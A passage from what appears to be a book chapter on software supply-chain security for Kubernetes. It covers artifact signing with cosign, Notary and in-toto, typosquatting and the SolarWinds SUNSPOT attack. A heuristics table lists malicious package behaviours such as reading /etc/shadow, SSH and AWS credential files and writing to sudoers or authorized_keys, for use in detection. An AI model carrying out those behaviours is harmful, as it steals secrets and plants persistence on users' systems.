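The hard half is the verification: git log --show-signature only proves the commit was signed by some key. Deciding whether that key genuinely belongs to a trusted colleague is exactly the PKI problem described above.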

Signing Builds and Metadata

In order to trust the output of your build infrastructure, you need to sign it so consumers can verify that it came from you. Signing metadata like SBOMs also allows consumers to detect vulnerabilities where the code is deployed in their systems. The following tools help by signing your artifacts, containers, or metadata.

Notary v1

Notary is the signing system built into Docker, and implements The Update Framework (TUF). It’s used for shipping software updates, but was never enabled in Kubernetes: it requires all images to be signed, or it won’t run them. portieris implements Notary as an admission controller for Kubernetes instead.

Notary v2 supports creating multiple signatures for OCI Artifacts and storing them in OCI image registries.

sigstore

sigstore is a public software signing and transparency service, which can sign containers with cosign and store the signatures in an OCI repository, something missing from Notary v1. As anything can be stored in a container (e.g., binaries, tarballs, scripts, or configuration files), cosign is a general artifact signing tool with OCI as its packaging format.

sigstore provides free certificates and tooling to automate and verify signatures of source code.

sigstore release announcement

Similar to Certificate Transparency, it has an append-only cryptographic ledger of events (called rekor), and each event has signed metadata about a software release as shown in Figure 4-7. Finally, it supports “a free Root-CA for code signing certs, that is, issuing certificates based on an OIDC email address” in fulcio. Together, these tools dramatically improve the capabilities of the supply chain security landscape.

It is designed for open source software, and is under rapid development. There are integrations for TUF and in-toto, hardware-based tokens are supported, and it’s compatible with most OCI registries.

sigstore’s cosign is used to sign the Distroless base image family.
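A sketch of the basic key-based cosign flow (the image name is illustrative, and flags vary slightly between cosign releases):

$ cosign generate-key-pair                                       # creates cosign.key and cosign.pub
$ cosign sign --key cosign.key registry.bctl.internal/app:1.0    # push a signature to the OCI registry
$ cosign verify --key cosign.pub registry.bctl.internal/app:1.0  # verify before deployment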

Figure 4-7. Storing sigstore manifests in the rekor transparency log

in-toto and TUF

The in-toto toolchain checksums and signs software builds—the steps and output of CI/CD pipelines. This provides transparent metadata about software build processes, increasing a consumer’s trust that an artifact was built from a specific source code revision.

in-toto link metadata (describing transitions between build stages and signing metadata about them) can be stored by tools like rekor and Grafeas, to be validated by consumers at time of use.

The in-toto signature ensures that a trusted party (e.g., the build server) has built and signed these objects. However, there is no guarantee that the third party’s keys have not been compromised—the only solution for this is to run parallel, isolated build environments and cross-check the cryptographic signatures. This is done with reproducible builds (in Debian, Arch Linux, and PyPi) to offer resilience to build tool compromise.

This is only possible if the CI and builds themselves are deterministic (no side effects of the build) and reproducible (the same artifacts are created by the source code). Relying on temporal or stochastic behaviors (time and randomness) will yield unreproducible binaries, as they are affected by timestamps in logfiles, or random seeds that affect compilation.

When using in-toto, an organization increases trust in their pipelines and artifacts, as there are verifiable signatures for everything. However, without an objective threat model or security assessment of the original build infrastructure, this doesn’t protect supply chains with a single build server that may have been compromised.

Producers using in-toto, with consumers that verify signatures, make an attacker’s life harder: they must fully compromise the signing infrastructure (as with SolarWinds).

GCP Binary Authorization

The GCP Binary Authorization feature allows signing of images and admission control to prevent unsigned, out-of-date, or vulnerable images from reaching production.

Validating expected signatures at runtime provides enforcement of pipeline controls: is this image free from known vulnerabilities, or does it have only a list of “accepted” vulnerabilities? Did it pass the automated acceptance tests in the pipeline? Did it come from the build pipeline at all?

Grafeas is used to store metadata from image scanning reports, and Kritis is an admission controller that verifies signatures and the absence of CVEs against the images.
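A sketch of working with the Binary Authorization admission policy from the gcloud CLI (some gcloud versions gate these commands behind the beta component):

$ gcloud container binauthz policy export > policy.yaml  # inspect the current admission policy
$ gcloud container binauthz policy import policy.yaml    # apply an edited policy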

Grafeas

Grafeas is a metadata store for pipeline metadata like vulnerability scans and test reports. Information about a container is recorded against its digest, which can be used to report on vulnerabilities of an organization’s images and ensure that build stages have successfully passed. Grafeas can also store in-toto link metadata.

Infrastructure Supply Chain

It’s also worth considering your operating system base image, and the location your Kubernetes control plane containers and packages are installed from.

Some distributions have historically modified and repackaged Kubernetes, and this introduces further supply chain risk of malicious code injection. Decide how you’ll handle this based upon your initial threat model, and architect systems and networks for compromise resilience.

Operator Privileges

Kubernetes Operators are designed to reduce human error by automating Kubernetes configuration and reacting to events. They interact with Kubernetes and whatever other resources are under the Operator’s control. Those resources may be in a single namespace, multiple namespaces, or outside of Kubernetes. This means Operators are often highly privileged to enable this complex automation, and so bring a level of risk.

An Operator-based supply chain attack might allow Captain Hashjack to discreetly deploy their malicious workloads by misusing RBAC, and a rogue resource could go completely undetected. While this attack is not yet widely seen, it has the potential to compromise a great number of clusters.

You must appraise and security-test third-party Operators before trusting them: write tests for their RBAC permissions so you are alerted if they change, and ensure an Operator’s securityContext configuration is suitable for the workload.

Attacking Higher Up the Supply Chain

To attack BCTL, Captain Hashjack may consider attacking the organizations that supply its software, such as operating systems, vendors, and open source packages. Your open source libraries may also have vulnerabilities, the most devastating of which has historically been an Apache Struts RCE, CVE-2017-5638.

Trusted open source libraries may have been “backdoored” (such as NPM’s event-stream package) or may be removed from the registry while in active use, such as left-pad (although registries now look to avoid this by preventing “unpublishing” packages).

Note

CVE-2017-5638 affected Apache Struts, a Java web framework.

The server didn’t parse Content-Type HTTP headers correctly, which allowed any commands to be executed in the process namespace as the web server’s user.

Struts 2 has a history of critical security bugs, many tied to its use of OGNL technology; some vulnerabilities can lead to arbitrary code execution.

Wikipedia

Code distributed by vendors can be compromised, as Codecov was. An error in its container image creation process allowed an attacker to modify a Bash uploader script run by customers to start builds. This attack compromised build Secrets that may then have been used against other systems.

Tip

The number of organizations using Codecov was significant. Searching for Git repos with grep.app showed there were over 9,200 results in the top 500,000 public Git repos. GitHub shows 397,518 code results at the time of this writing.

Poorly written code that fails to handle untrusted user input or internal errors may have remotely exploitable vulnerabilities. Application security is responsible for preventing this easy access to your systems.

The industry-recognised moniker for this is “shift left,” which means you should run static and dynamic analysis of the code your developers write as they write it: add automated tooling to the IDE, provide a local security testing workflow, run configuration tests before deployment, and generally don’t leave security considerations to the last possible moment as has been traditional in software.

Types of Supply Chain Attack

TAG Security’s Catalog of Supply Chain Compromises lists attacks affecting packages with millions of weekly downloads across various application dependency repositories and vendors, and hundreds of millions of total installations.

The combined downloads, including both benign and malicious versions, for the most popular malicious packages (event-stream—190 million, eslint-scope—442 million, bootstrap-sass—30 million, and rest-client—114 million) sum to 776 million.

“Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages”

In the quoted paper, the authors identify four actors in the open source supply chain:

  • Registry Maintainers (RMs)

  • Package Maintainers (PMs)

  • Developers (Devs)

  • End-users (Users)

Those with consumers have a responsibility to verify the code they pass to their customers, and a duty to provide verifiable metadata to build confidence in the artifacts.

There’s a lot to defend against to ensure that Users receive a trusted artifact (Table 4-4):

  • Source code

  • Publishing infrastructure

  • Dev tooling

  • Malicious maintainer

  • Negligence

  • Fake toolchain

  • Watering-hole attack

  • Multiple steps

Registry maintainers should guard publishing infrastructure from typosquatters: individuals who register a package whose name looks similar to that of a widely deployed package.

Table 4-4. Examples of attacking publishing infrastructure

| Attack | Package name | Typosquatted name |
|---|---|---|
| Typosquatting | event-stream | eventstream |
| Different account | user/package | usr/package, user_/package |
| Combosquatting | package | package-2, package-ng |
| Account takeover | user/package | user/package—no change, as the user has been compromised by the attacker |
| Social engineering | user/package | user/package—no change, as the user has willingly given repository access to the attacker |

As Figure 4-8 demonstrates, the supply chain of a package manager holds many risks.

Figure 4-8. Simplified relationships of stakeholders and threats in the package manager ecosystem (source: “Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages”)

Open Source Ingestion

This attention to detail may become exhausting when applied to every package and quickly becomes impractical at scale. This is where a web of trust between producers and consumers alleviates some of the burden of double-checking the proofs at every link in the chain. However, nothing can be fully trusted, and regular reverification of code is necessary to account for newly announced CVEs or zero-days.

In “Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages”, the authors identify relevant issues as listed in Table 4-5.

Table 4-5. Heuristic rules derived from existing supply chain attacks and other malware studies

| Type | Description |
|---|---|
| Metadata | The package name is similar to popular ones in the same registry. |
| | The package name is the same as popular packages in other registries, but the authors are different. |
| | The package depends on or shares authors with known malware. |
| | The package has older versions released around the same time as known malware. |
| | The package contains Windows PE files or Linux ELF files. |
| Static | The package has customized installation logic. |
| | The package adds network, process, or code generation APIs in recently released versions. |
| | The package has flows from filesystem sources to network sinks. |
| | The package has flows from network sources to code generation or process sinks. |
| Dynamic | The package contacts unexpected IPs or domains, where expected ones are official registries and code hosting services. |
| | The package reads from sensitive file locations such as /etc/shadow, /home/<user>/.ssh, /home/<user>/.aws. |
| | The package writes to sensitive file locations such as /usr/bin, /etc/sudoers, /home/<user>/.ssh/authorized_keys. |
| | The package spawns unexpected processes, where expected ones are initialized to registry clients (e.g., pip). |

The paper summarises that:

  • Typosquatting and account compromise are low-cost to an attacker, and are the most widely exploited attack vectors.

  • Stealing data and dropping backdoors are the most common malicious post-exploit behaviors, suggesting wide consumer targeting.

  • 20% of identified malicious packages persisted in package managers for over 400 days and had more than 1K downloads.

  • New techniques include code obfuscation, multistage payloads, and logic bombs to evade detection.

Additionally, the maintainers of packages with lower numbers of installations are unlikely to act quickly on a reported compromise, as Figure 4-9 demonstrates. It could be that the developers are not paid to support these open source packages. Creating incentives for these maintainers with well-written patches and timely assistance merging them, or financial support for handling reports from a bug bounty program, are effective ways to decrease vulnerabilities in popular but rarely maintained packages.

Figure 4-9. Correlation between number of persistence days and number of downloads (R&R = Reported and Removed; R&I = Reported and Investigating) (source: “Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages”)

Application Vulnerability Throughout the SDLC

The Software Development Lifecycle (SDLC) is an application’s journey from a glint in a developer’s eye, to its secure build and deployment on production systems.

As applications progress from development to production, they have a varying risk profile, as shown in Table 4-6.

Table 4-6. Application vulnerabilities throughout the SDLC

| System lifecycle stage | Higher risk | Lower risk |
|---|---|---|
| Development to production deployment | Application code (changes frequently) | Application libraries, operating system packages |
| Established production deployment to decommissioning | Slowly decaying application libraries and operating system packages | Application code (changes less frequently) |

The risk profile of an application running in production changes as its lifespan lengthens, as its software becomes progressively more out-of-date. This is known as “reverse uptime”—the correlation between risk of an application’s compromise and the time since its deployment (e.g., the date of the container’s build). An average of reverse uptime in an organization could also be considered “mean time to …”:

  • Compromise (application has a remotely exploitable vulnerability)

  • Failure (application no longer works with the updated system or external APIs)

  • Update (change application code)

  • Patch (to update dependencies versions explicitly)

  • Rebuild (to pull new server dependencies)
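Image age is cheap to measure, which makes reverse uptime easy to track. A sketch, assuming the image creation timestamp reflects its build date (names are illustrative):

# When was this locally pulled image built?
$ docker inspect --format '{{.Created}}' bctl/app:latest
# Or query the registry directly without pulling the image
$ skopeo inspect docker://registry.bctl.internal/app:latest | jq .Created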

Defending Against SUNBURST

So would the techniques in this chapter save you from a SUNBURST-like attack? Let’s look at how it worked.

The attackers gained access to the SolarWinds systems on 4th September 2019 (Figure 4-10). This might have happened through a spear-phishing email attack that allowed further escalation into SolarWinds’ systems, or through some software misconfiguration they found in build infrastructure or internet-facing servers.

Figure 4-10. SUNSPOT timeline

The threat actors stayed hidden for a week, then started testing the SUNSPOT injection code that would eventually compromise the SolarWinds product. This phase progressed quietly for two months.

Internal detection may have discovered the attackers here; however, build infrastructure is rarely subjected to the same level of security scrutiny, intrusion detection, and monitoring as production systems, despite it delivering code to production or customers. This is something we can address using our more granular security controls around containers. Of course, a backdoor straight into a host system remains difficult to detect unless intrusion detection is running on the host, which may be noisy on shared build nodes that necessarily run many jobs for their consumers.

Almost six months after the initial compromise of the build infrastructure, the SUNSPOT malware was deployed. A month later, the infamous SolarWinds Hotfix 5 DLL containing the malicious implant was made available to customers, and once the threat actor confirmed that customers were infected, it removed its malware from the build VMs.

It was a further six months before the customer infections were identified.

This SUNSPOT malware changed source code immediately before it was compiled, and reverted it to its original form immediately afterwards, as shown in Figure 4-11. This required observing the filesystem and changing its contents.

Figure 4-11. SUNSPOT malware

A build-stage signing tool that verifies its inputs and outputs (as in-toto does) then invokes a subprocess to perform a build step may be immune to this variant of the attack, although it may turn security into a race condition between the in-toto hash function and the malware that modifies the filesystem.

Bear in mind that if an attacker has control of your build environment, they can potentially modify any files in it. Although this is bad, they cannot regenerate signatures made outside the build: this is why your cryptographically signed artifacts are safer than unsigned binary blobs or Git code. Tampering with signed or checksummed artifacts can be detected, because attackers are unlikely to have the private keys needed to, for example, re-sign tampered data.

SUNSPOT changed the files that were about to be compiled. In a container build, the same problem exists: the local filesystem must be trusted. Signing the inputs and validating outputs goes some way to mitigating this attack, but a motivated attacker with full control of a build system may be impossible to distinguish from legitimate build activity.

It may not be possible to entirely protect a build system without a complete implementation of all supply chain security recommendations. Your organization’s ultimate risk appetite should be used to determine how much effort you wish to expend protecting this vital, vulnerable part of your system: for example, critical infrastructure projects may wish to fully audit the hardware and software they receive, root chains of trust in hardware modules wherever possible, and strictly regulate the employees permitted to interact with build systems. For most organizations, this will be deeply impractical.

Tip

Nixpkgs (utilized in NixOS) bootstraps deterministically from a small collection of tools. This is perhaps the ultimate in reproducible builds, with some useful security side effects; it allows end-to-end trust and reproducibility for all images built from it.

Trustix, another Nix project, compares build outputs against a Merkle tree log across multiple untrusted build servers to determine if a build has been compromised.

So these recommendations might not truly prevent supply chain compromise like SUNBURST, but they can protect some of the attack vectors and reduce your total risk exposure. To protect your build system:

  • Give developers root access to integration and testing environments, not build and packaging systems.

  • Use ephemeral build infrastructure and protect builds from cache poisoning.

  • Generate and distribute SBOMs so consumers can validate the artifacts.

  • Run intrusion detection on build servers.

  • Scan open source libraries and operating system packages.

  • Create reproducible builds on distributed infrastructure and compare the results to detect tampering (see the sketch after this list).

  • Run hermetic, self-contained builds that only use what’s made available to them (instead of calling out to other systems or the internet), and avoid decision logic in build scripts.

  • Keep builds simple and easy to reason about, and security review and scan the build scripts like any other software.
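The reproducible-builds item in that list reduces to comparing digests across independent builders. A sketch, assuming the same pinned source revision is built in two isolated environments; note that container builds are rarely bit-for-bit reproducible without extra effort (timestamps alone will break this), so tooling such as kaniko’s --reproducible flag or Nix helps:

# On each independent, network-isolated builder:
builder-a$ docker build --network=none -t app:candidate . \
             && docker save app:candidate | sha256sum
builder-b$ docker build --network=none -t app:candidate . \
             && docker save app:candidate | sha256sum
# Differing digests indicate nondeterminism, or tampering on one builder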

Conclusion

Supply chain attacks are difficult to defend against completely. Malicious software on public container registries is often detected rather than prevented, and the same is true for application libraries; potential insecurity is part of the reality of using any third-party software.

The SLSA Framework suggests the milestones to achieve in order to secure your supply chain, assuming your build infrastructure is already secure! The Software Supply Chain Security paper details concrete patterns and practices for Source Code, Materials, Build Pipelines, Artifacts, and Deployments, to guide you on your supply chain security voyage.

Scanning container images and Git repositories for published CVEs is a cloud native application’s minimal viable security. If you assume all workloads are potentially hostile, your container security context and configuration should be tuned to match the workload’s sensitivity. Container seccomp and LSM profiles should always be configured to defend against new, undefined behavior or system calls from a freshly compromised dependency.

Sign your build artifacts with cosign, Notary, and in-toto during CI/CD, then validate their signatures whenever they are consumed. Distribute SBOMs so consumers can verify your dependency chain for new vulnerabilities. While these measures only contribute to wider supply chain security coverage, they frustrate attackers and decrease BCTL’s risk of falling prey to drive-by container pirates.
